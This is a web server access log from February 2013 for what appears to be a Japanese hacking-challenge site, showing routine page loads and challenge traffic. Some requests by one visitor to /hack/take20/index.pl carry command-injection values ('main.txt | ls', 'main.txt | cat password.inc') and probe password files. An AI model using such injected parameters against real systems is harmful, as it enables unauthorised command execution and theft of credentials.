121.108.50.78 – – [13/Feb/2013:01:55:05 +0900] “GET /hack/take10.php HTTP/1.1” 200 19908
58.1.238.166 – – [13/Feb/2013:01:55:07 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
121.108.50.78 – – [13/Feb/2013:01:55:09 +0900] “GET /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22662
180.43.43.180 – – [13/Feb/2013:01:55:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
37.59.18.46 – – [13/Feb/2013:01:55:24 +0900] “HEAD /hack/seiseki.php HTTP/1.1” 200 –
121.108.50.78 – – [13/Feb/2013:01:55:25 +0900] “GET /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22662
37.59.18.35 – – [13/Feb/2013:01:55:28 +0900] “GET /hack/seiseki.php HTTP/1.1” 200 15152
119.240.206.111 – – [13/Feb/2013:01:55:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
58.1.238.166 – – [13/Feb/2013:01:56:07 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
121.108.50.78 – – [13/Feb/2013:01:56:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 2021
180.43.43.180 – – [13/Feb/2013:01:56:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
125.197.65.110 – – [13/Feb/2013:01:56:39 +0900] “GET / HTTP/1.1” 200 12691
125.197.65.110 – – [13/Feb/2013:01:56:39 +0900] “GET /styles/global/jquery_ui.css HTTP/1.1” 200 34637
125.197.65.110 – – [13/Feb/2013:01:56:39 +0900] “GET /styles/cbv2new/theme/main.css HTTP/1.1” 200 70972
125.197.65.110 – – [13/Feb/2013:01:56:39 +0900] “GET /js/functions.js HTTP/1.1” 200 36519
125.197.65.110 – – [13/Feb/2013:01:56:39 +0900] “GET /js/jquery_plugs/cookie.js HTTP/1.1” 200 1966
125.197.65.110 – – [13/Feb/2013:01:56:39 +0900] “GET /js/jquery.js HTTP/1.1” 200 85939
125.197.65.110 – – [13/Feb/2013:01:56:40 +0900] “GET /styles/cbv2new/theme/view_channel.css HTTP/1.1” 200 2363
125.197.65.110 – – [13/Feb/2013:01:56:39 +0900] “GET /player/jw_player/jwplayer.js HTTP/1.1” 200 155549
125.197.65.110 – – [13/Feb/2013:01:56:40 +0900] “GET /styles/cbv2new/theme/rating.css HTTP/1.1” 200 4028
125.197.65.110 – – [13/Feb/2013:01:56:39 +0900] “GET /js/ui/jquery-ui.js HTTP/1.1” 200 200067
125.197.65.110 – – [13/Feb/2013:01:56:41 +0900] “GET /styles/cbv2new/images/dot.gif HTTP/1.1” 200 43
125.197.65.110 – – [13/Feb/2013:01:56:41 +0900] “GET /styles/cbv2new/images/nav_grads.png HTTP/1.1” 200 4565
125.197.65.110 – – [13/Feb/2013:01:56:41 +0900] “GET /styles/cbv2new/images/logo.png HTTP/1.1” 200 74382
125.197.65.110 – – [13/Feb/2013:01:56:41 +0900] “GET /styles/cbv2new/images/search.png HTTP/1.1” 200 1358
125.197.65.110 – – [13/Feb/2013:01:56:41 +0900] “GET /styles/cbv2new/images/tabs_bg.png HTTP/1.1” 200 251
125.197.65.110 – – [13/Feb/2013:01:56:41 +0900] “GET /styles/cbv2new/images/tabs_sp.png HTTP/1.1” 200 117
125.197.65.110 – – [13/Feb/2013:01:56:41 +0900] “GET /styles/cbv2new/images/main_vid_bg.png HTTP/1.1” 200 133
125.197.65.110 – – [13/Feb/2013:01:56:41 +0900] “POST /ajax.php HTTP/1.1” 200 –
125.197.65.110 – – [13/Feb/2013:01:56:41 +0900] “GET /styles/cbv2new/images/blocks.png HTTP/1.1” 200 20226
125.197.65.110 – – [13/Feb/2013:01:56:41 +0900] “GET /styles/cbv2new/images/shadows.png HTTP/1.1” 200 12395
125.197.65.110 – – [13/Feb/2013:01:56:41 +0900] “GET /styles/cbv2new/images/line_sps.png HTTP/1.1” 200 129
125.197.65.110 – – [13/Feb/2013:01:56:41 +0900] “GET /styles/cbv2new/images/ajax-loader.gif HTTP/1.1” 200 1482
125.197.65.110 – – [13/Feb/2013:01:56:41 +0900] “GET /favicon.ico HTTP/1.1” 200 41246
125.197.65.110 – – [13/Feb/2013:01:56:45 +0900] “POST /ajax.php HTTP/1.1” 200 –
125.197.65.110 – – [13/Feb/2013:01:56:46 +0900] “POST /ajax.php HTTP/1.1” 200 –
125.197.65.110 – – [13/Feb/2013:01:56:47 +0900] “POST /ajax.php HTTP/1.1” 200 –
119.240.206.111 – – [13/Feb/2013:01:56:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
125.197.65.110 – – [13/Feb/2013:01:56:48 +0900] “GET /hack/ HTTP/1.1” 200 18214
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/bootstrap/css/bootstrap-custom.css HTTP/1.1” 200 877
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/bootstrap/css/bootstrap-responsive.min.css HTTP/1.1” 200 16553
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/ajax.js HTTP/1.1” 200 6398
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/css/common.css HTTP/1.1” 200 4946
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/bootstrap/css/bootstrap.min.css HTTP/1.1” 200 103314
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-alert.js HTTP/1.1” 200 2524
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-transition.js HTTP/1.1” 200 1756
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-modal.js HTTP/1.1” 200 6579
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-dropdown.js HTTP/1.1” 200 4236
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/bootstrap/assets/js/jquery.js HTTP/1.1” 200 92791
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-scrollspy.js HTTP/1.1” 200 4610
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-tab.js HTTP/1.1” 200 3496
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-tooltip.js HTTP/1.1” 200 7921
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-popover.js HTTP/1.1” 200 3147
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-button.js HTTP/1.1” 200 2841
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-collapse.js HTTP/1.1” 200 4618
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-carousel.js HTTP/1.1” 200 5320
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-typeahead.js HTTP/1.1” 200 7985
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/jquery.socialbutton-1.9.0.js HTTP/1.1” 200 23494
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/google-code-prettify/prettify.js HTTP/1.1” 200 13632
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-affix.js HTTP/1.1” 200 3483
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/js/google-code-prettify/prettify.css HTTP/1.1” 200 2066
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/css/font-awesome.css HTTP/1.1” 200 21596
125.197.65.110 – – [13/Feb/2013:01:56:50 +0900] “GET /hack/css/font-awesome-ie7.min.css HTTP/1.1” 200 25255
125.197.65.110 – – [13/Feb/2013:01:56:51 +0900] “GET /hack/img/8946.png HTTP/1.1” 200 65594
125.197.65.110 – – [13/Feb/2013:01:56:52 +0900] “GET /hack/font/fontawesome-webfont.woff?v=3.0.1 HTTP/1.1” 200 29380
125.197.65.110 – – [13/Feb/2013:01:56:52 +0900] “GET /signup.php HTTP/1.1” 200 17096
125.197.65.110 – – [13/Feb/2013:01:56:54 +0900] “GET /styles/cbv2new/images/buttons.png HTTP/1.1” 200 2188
125.197.65.110 – – [13/Feb/2013:01:56:54 +0900] “GET /styles/cbv2new/images/simple_gradient.png HTTP/1.1” 200 287
125.197.65.110 – – [13/Feb/2013:01:56:54 +0900] “GET /plugins/signup_captcha/captcha.php HTTP/1.1” 200 8628
125.197.65.110 – – [13/Feb/2013:01:56:54 +0900] “GET /styles/global/images/ui-bg_inset-hard_100_fcfdfd_1x100.png HTTP/1.1” 404 11071
125.197.65.110 – – [13/Feb/2013:01:57:02 +0900] “GET /styles/global/images/ui-bg_gloss-wave_55_5c9ccc_500x100.png HTTP/1.1” 404 11071
125.197.65.110 – – [13/Feb/2013:01:57:02 +0900] “GET /styles/global/images/ui-icons_d8e7f3_256x240.png HTTP/1.1” 404 11071
125.197.65.110 – – [13/Feb/2013:01:57:02 +0900] “GET /styles/global/images/ui-bg_glass_85_dfeffc_1x400.png HTTP/1.1” 404 11071
125.197.65.110 – – [13/Feb/2013:01:57:02 +0900] “GET /styles/global/images/ui-bg_inset-hard_100_f5f8f9_1x100.png HTTP/1.1” 404 11071
58.1.238.166 – – [13/Feb/2013:01:57:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
121.108.50.78 – – [13/Feb/2013:01:57:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 2021
125.197.65.110 – – [13/Feb/2013:01:57:10 +0900] “GET / HTTP/1.1” 200 12691
180.43.43.180 – – [13/Feb/2013:01:57:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
125.197.65.110 – – [13/Feb/2013:01:57:10 +0900] “POST /ajax.php HTTP/1.1” 200 –
119.240.206.111 – – [13/Feb/2013:01:57:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
58.1.238.166 – – [13/Feb/2013:01:58:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
121.108.50.78 – – [13/Feb/2013:01:58:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 2021
180.43.43.180 – – [13/Feb/2013:01:58:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
61.21.39.196 – – [13/Feb/2013:01:58:26 +0900] “GET /hack/seiseki.php HTTP/1.1” 200 15152
61.21.39.196 – – [13/Feb/2013:01:58:26 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-modal.js HTTP/1.1” 200 6579
61.21.39.196 – – [13/Feb/2013:01:58:26 +0900] “GET /hack/js/bootstrap/css/bootstrap-responsive.min.css HTTP/1.1” 200 16553
61.21.39.196 – – [13/Feb/2013:01:58:26 +0900] “GET /hack/css/common.css HTTP/1.1” 200 4946
61.21.39.196 – – [13/Feb/2013:01:58:26 +0900] “GET /hack/js/bootstrap/assets/js/bootstrap-dropdown.js HTTP/1.1” 200 4236
61.21.39.196 – – [13/Feb/2013:01:58:26 +0900] “GET /hack/js/ajax.js HTTP/1.1” 200 6398
61.21.39.196 – – [13/Feb/2013:01:58:26 +0900] “GET /hack/js/bootstrap/css/bootstrap.min.css HTTP/1.1” 200 103314
121.108.50.78 – – [13/Feb/2013:01:58:27 +0900] “GET /hack/take21.php HTTP/1.1” 200 20815
121.108.50.78 – – [13/Feb/2013:01:58:31 +0900] “GET /hack/take21.php HTTP/1.1” 200 20815
119.240.206.111 – – [13/Feb/2013:01:58:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
49.212.62.97 – – [13/Feb/2013:01:58:51 +0900] “GET /hack/seiseki.php HTTP/1.1” 200 15152
58.1.238.166 – – [13/Feb/2013:01:59:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:01:59:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
121.108.50.78 – – [13/Feb/2013:01:59:13 +0900] “GET /hack/take21.php HTTP/1.1” 200 20815
121.108.50.78 – – [13/Feb/2013:01:59:28 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
119.240.206.111 – – [13/Feb/2013:01:59:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
58.1.238.166 – – [13/Feb/2013:02:00:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:02:00:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
121.108.50.78 – – [13/Feb/2013:02:00:16 +0900] “GET /hack/take1.php HTTP/1.1” 200 25267
121.108.50.78 – – [13/Feb/2013:02:00:30 +0900] “GET /hack/svn/index.php HTTP/1.1” 200 20841
121.108.50.78 – – [13/Feb/2013:02:00:33 +0900] “GET /hack/take14.php HTTP/1.1” 200 21804
121.108.50.78 – – [13/Feb/2013:02:00:44 +0900] “GET /hack/take15.php HTTP/1.1” 200 21309
119.240.206.111 – – [13/Feb/2013:02:00:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
121.108.50.78 – – [13/Feb/2013:02:00:48 +0900] “GET /hack/take13.php HTTP/1.1” 200 20889
121.108.50.78 – – [13/Feb/2013:02:00:50 +0900] “GET /hack/take17.php HTTP/1.1” 200 21737
121.108.50.78 – – [13/Feb/2013:02:00:53 +0900] “GET /hack/take19.php HTTP/1.1” 200 20948
121.108.50.78 – – [13/Feb/2013:02:00:57 +0900] “GET /hack/take10.php HTTP/1.1” 200 19908
121.108.50.78 – – [13/Feb/2013:02:00:59 +0900] “GET /hack/houhou.php HTTP/1.1” 200 22317
58.1.238.166 – – [13/Feb/2013:02:01:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:02:01:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
121.108.50.78 – – [13/Feb/2013:02:01:14 +0900] “GET /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 16915
121.108.50.78 – – [13/Feb/2013:02:01:15 +0900] “GET /hack/seiseki.php HTTP/1.1” 200 15204
121.108.50.78 – – [13/Feb/2013:02:01:15 +0900] “GET /hack/img/oukan.png HTTP/1.1” 200 1198825
121.108.50.78 – – [13/Feb/2013:02:01:29 +0900] “GET /hack/houhou.php HTTP/1.1” 200 22317
121.108.50.78 – – [13/Feb/2013:02:01:31 +0900] “GET /hack/st_list.php HTTP/1.1” 200 1060847
119.240.206.111 – – [13/Feb/2013:02:01:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
58.1.238.166 – – [13/Feb/2013:02:02:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:02:02:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
121.108.50.78 – – [13/Feb/2013:02:02:12 +0900] “GET /hack/houhou.php HTTP/1.1” 200 22317
121.108.50.78 – – [13/Feb/2013:02:02:17 +0900] “GET /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22662
121.108.50.78 – – [13/Feb/2013:02:02:21 +0900] “GET /hack/take21.php HTTP/1.1” 200 20815
121.108.50.78 – – [13/Feb/2013:02:02:25 +0900] “GET /hack/take21.php HTTP/1.1” 200 20815
119.240.206.111 – – [13/Feb/2013:02:02:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
58.1.238.166 – – [13/Feb/2013:02:03:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:02:03:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
121.108.50.78 – – [13/Feb/2013:02:03:23 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
119.240.206.111 – – [13/Feb/2013:02:03:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
58.1.238.166 – – [13/Feb/2013:02:04:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:02:04:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
119.240.206.111 – – [13/Feb/2013:02:04:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
58.1.238.166 – – [13/Feb/2013:02:05:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:02:05:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
182.166.232.1 – – [13/Feb/2013:02:05:29 +0900] “HEAD / HTTP/1.1” 200 –
119.240.206.111 – – [13/Feb/2013:02:05:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
58.1.238.166 – – [13/Feb/2013:02:06:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:02:06:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
119.240.206.111 – – [13/Feb/2013:02:06:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
121.108.50.78 – – [13/Feb/2013:02:07:05 +0900] “GET /hack/take21.php HTTP/1.1” 200 20815
58.1.238.166 – – [13/Feb/2013:02:07:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
121.108.50.78 – – [13/Feb/2013:02:07:08 +0900] “GET /hack/bbs/ HTTP/1.1” 200 5996
121.108.50.78 – – [13/Feb/2013:02:07:09 +0900] “GET /hack/bbs/css/font.css HTTP/1.1” 200 695
121.108.50.78 – – [13/Feb/2013:02:07:09 +0900] “GET /hack/bbs/css/default.css HTTP/1.1” 200 7112
121.108.50.78 – – [13/Feb/2013:02:07:09 +0900] “GET /hack/bbs/css/menu.css HTTP/1.1” 200 1531
121.108.50.78 – – [13/Feb/2013:02:07:09 +0900] “GET /hack/bbs/css/block3.css HTTP/1.1” 200 744
121.108.50.78 – – [13/Feb/2013:02:07:09 +0900] “GET /hack/bbs/css/color-black.css HTTP/1.1” 200 3319
121.108.50.78 – – [13/Feb/2013:02:07:09 +0900] “GET /hack/bbs/css/block.css HTTP/1.1” 200 1938
121.108.50.78 – – [13/Feb/2013:02:07:09 +0900] “GET /hack/bbs/images/rss.gif HTTP/1.1” 200 635
121.108.50.78 – – [13/Feb/2013:02:07:09 +0900] “GET /hack/bbs/img.php?id=1&w=150&h=150 HTTP/1.1” 200 9148
121.108.50.78 – – [13/Feb/2013:02:07:09 +0900] “GET /hack/bbs/images/logo1.jpg HTTP/1.1” 200 17290
121.108.50.78 – – [13/Feb/2013:02:07:09 +0900] “GET /hack/bbs/images/bg_button.gif HTTP/1.1” 200 514
121.108.50.78 – – [13/Feb/2013:02:07:09 +0900] “GET /hack/bbs/favicon.ico HTTP/1.1” 404 106
180.43.43.180 – – [13/Feb/2013:02:07:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
121.108.50.78 – – [13/Feb/2013:02:07:16 +0900] “GET /hack/bbs/?m=pc&a=topicComment.view&topic_id=7 HTTP/1.1” 200 15796
121.108.50.78 – – [13/Feb/2013:02:07:16 +0900] “GET /hack/bbs/img.php?id=1&w=150&h=150 HTTP/1.1” 200 9148
121.108.50.78 – – [13/Feb/2013:02:07:16 +0900] “GET /hack/bbs/favicon.ico HTTP/1.1” 404 106
119.240.206.111 – – [13/Feb/2013:02:07:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
121.108.50.78 – – [13/Feb/2013:02:08:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
58.1.238.166 – – [13/Feb/2013:02:08:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:02:08:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
121.108.50.78 – – [13/Feb/2013:02:08:28 +0900] “GET /hack/bbs/ HTTP/1.1” 200 5996
121.108.50.78 – – [13/Feb/2013:02:08:28 +0900] “GET /hack/bbs/favicon.ico HTTP/1.1” 404 106
119.240.206.111 – – [13/Feb/2013:02:08:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
121.108.50.78 – – [13/Feb/2013:02:08:49 +0900] “GET /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22662
121.108.50.78 – – [13/Feb/2013:02:08:58 +0900] “POST /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22765
121.108.50.78 – – [13/Feb/2013:02:09:01 +0900] “POST /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22782
121.108.50.78 – – [13/Feb/2013:02:09:03 +0900] “POST /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22879
121.108.50.78 – – [13/Feb/2013:02:09:05 +0900] “POST /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22879
58.1.238.166 – – [13/Feb/2013:02:09:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
121.108.50.78 – – [13/Feb/2013:02:09:09 +0900] “GET /hack/take21.php HTTP/1.1” 200 20815
180.43.43.180 – – [13/Feb/2013:02:09:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
121.108.50.78 – – [13/Feb/2013:02:09:11 +0900] “GET /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22776
121.108.50.78 – – [13/Feb/2013:02:09:25 +0900] “GET /hack/take20/index.php HTTP/1.1” 404 106
121.108.50.78 – – [13/Feb/2013:02:09:29 +0900] “GET /hack/take20/index.pl HTTP/1.1” 200 22776
66.249.73.113 – – [13/Feb/2013:02:09:31 +0900] “GET /hack/take20/index.pl HTTP/1.1” 200 22759
121.108.50.78 – – [13/Feb/2013:02:09:35 +0900] “POST /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22879
121.108.50.78 – – [13/Feb/2013:02:09:37 +0900] “POST /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22879
121.108.50.78 – – [13/Feb/2013:02:09:39 +0900] “POST /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22879
121.108.50.78 – – [13/Feb/2013:02:09:45 +0900] “GET /hack/take20/index.pl?file=password.txt HTTP/1.1” 200 22831
119.240.206.111 – – [13/Feb/2013:02:09:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
121.108.50.78 – – [13/Feb/2013:02:09:58 +0900] “GET /hack/take20/index.pl?ls HTTP/1.1” 200 22831
58.1.238.166 – – [13/Feb/2013:02:10:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:02:10:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
121.108.50.78 – – [13/Feb/2013:02:10:26 +0900] “GET /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22831
121.108.50.78 – – [13/Feb/2013:02:10:34 +0900] “GET /hack/take20/index.pl?file=main.txt%20|%20ls HTTP/1.1” 200 22863
66.249.73.113 – – [13/Feb/2013:02:10:36 +0900] “GET /hack/take20/index.pl?file=main.txt%20%7C%20ls HTTP/1.1” 200 22759
173.45.73.18 – – [13/Feb/2013:02:10:40 +0900] “GET / HTTP/1.1” 200 12691
121.108.50.78 – – [13/Feb/2013:02:10:44 +0900] “GET /hack/take20/index.pl?file=password.inc HTTP/1.1” 200 22933
119.240.206.111 – – [13/Feb/2013:02:10:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
121.108.50.78 – – [13/Feb/2013:02:11:04 +0900] “GET /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22831
58.1.238.166 – – [13/Feb/2013:02:11:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:02:11:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
121.108.50.78 – – [13/Feb/2013:02:11:11 +0900] “GET /hack/take20/index.pl?file=main.txt%20|%20cat%20password.inc HTTP/1.1” 200 22885
121.108.50.78 – – [13/Feb/2013:02:11:24 +0900] “POST /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22702
119.240.206.111 – – [13/Feb/2013:02:11:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
74.112.131.156 – – [13/Feb/2013:02:11:51 +0900] “GET /robots.txt HTTP/1.1” 404 11071
122.135.148.29 – – [13/Feb/2013:02:11:51 +0900] “HEAD /hack/take20/index.pl HTTP/1.1” 200 –
74.112.131.156 – – [13/Feb/2013:02:11:52 +0900] “GET /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22759
184.169.203.101 – – [13/Feb/2013:02:11:52 +0900] “HEAD /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 –
184.169.203.101 – – [13/Feb/2013:02:11:52 +0900] “HEAD /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 –
67.195.112.152 – – [13/Feb/2013:02:11:53 +0900] “HEAD /hack/take20/index.pl HTTP/1.0” 200 –
74.112.131.153 – – [13/Feb/2013:02:11:57 +0900] “GET /robots.txt HTTP/1.1” 404 11071
72.30.161.247 – – [13/Feb/2013:02:11:57 +0900] “HEAD /hack/take20/index.pl HTTP/1.0” 200 –
50.18.21.10 – – [13/Feb/2013:02:11:57 +0900] “GET /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22759
46.236.24.48 – – [13/Feb/2013:02:11:57 +0900] “GET /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22759
74.112.131.156 – – [13/Feb/2013:02:11:57 +0900] “GET /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22759
23.22.39.206 – – [13/Feb/2013:02:11:57 +0900] “GET /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 22759
58.1.238.166 – – [13/Feb/2013:02:12:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:02:12:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
119.105.133.25 – – [13/Feb/2013:02:12:13 +0900] “HEAD /hack/take20/index.pl?file=main.txt HTTP/1.1” 200 –
121.108.50.78 – – [13/Feb/2013:02:12:16 +0900] “GET /hack/take21.php HTTP/1.1” 200 20809
121.108.50.78 – – [13/Feb/2013:02:12:21 +0900] “GET /hack/take21.php HTTP/1.1” 200 20809
121.108.50.78 – – [13/Feb/2013:02:12:44 +0900] “POST /hack/take21.php HTTP/1.1” 200 20867
121.108.50.78 – – [13/Feb/2013:02:12:47 +0900] “POST /hack/take21.php HTTP/1.1” 200 20884
119.240.206.111 – – [13/Feb/2013:02:12:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
121.108.50.78 – – [13/Feb/2013:02:12:49 +0900] “POST /hack/take21.php HTTP/1.1” 200 20884
121.108.50.78 – – [13/Feb/2013:02:12:51 +0900] “POST /hack/take21.php HTTP/1.1” 200 20884
121.108.50.78 – – [13/Feb/2013:02:12:53 +0900] “POST /hack/take21.php HTTP/1.1” 200 20988
58.1.238.166 – – [13/Feb/2013:02:13:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:02:13:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
121.108.50.78 – – [13/Feb/2013:02:13:22 +0900] “POST /hack/take21.php HTTP/1.1” 200 20988
121.108.50.78 – – [13/Feb/2013:02:13:24 +0900] “POST /hack/take21.php HTTP/1.1” 200 20988
121.108.50.78 – – [13/Feb/2013:02:13:25 +0900] “POST /hack/take21.php HTTP/1.1” 200 21032
119.240.206.111 – – [13/Feb/2013:02:13:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
58.1.238.166 – – [13/Feb/2013:02:14:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:02:14:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
121.108.50.78 – – [13/Feb/2013:02:14:27 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
119.240.206.111 – – [13/Feb/2013:02:14:48 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 279
58.1.238.166 – – [13/Feb/2013:02:15:06 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 315
180.43.43.180 – – [13/Feb/2013:02:15:10 +0900] “POST /hack/bord/inc/bord.php HTTP/1.1” 200 41
116.94.220.46 – – [13/Feb/2013:02:15:22 +0900] “GET /hack/ HTTP/1.1” 200 18214
116.94.220.46 – – [13/Feb/2013:02:15:23 +0900] “GET /hack/js/bootstrap/css/bootstrap-responsive.min.css HTTP/1.1” 200 16553
116.94.220.46 – – [13/Feb/2013:02:15:23 +0900] “GET /hack/js/bootstrap/css/bootstrap-custom.css HTTP/1.1” 200 877
116.94.220.46 – – [13/Feb/2013:02:15:23 +0900] “GET /hack/js/ajax.js HTTP/1.1” 200 6398
116.94.220.46 – – [13/Feb/2013:02:15:23 +0900] “GET /hack/css/common.css HTTP/1.1” 200 4946
116.94.220.46 – – [13/Feb/2013:02:15:23 +0900] “GET /hack/img/8946.png HTTP/1.1” 200 65594
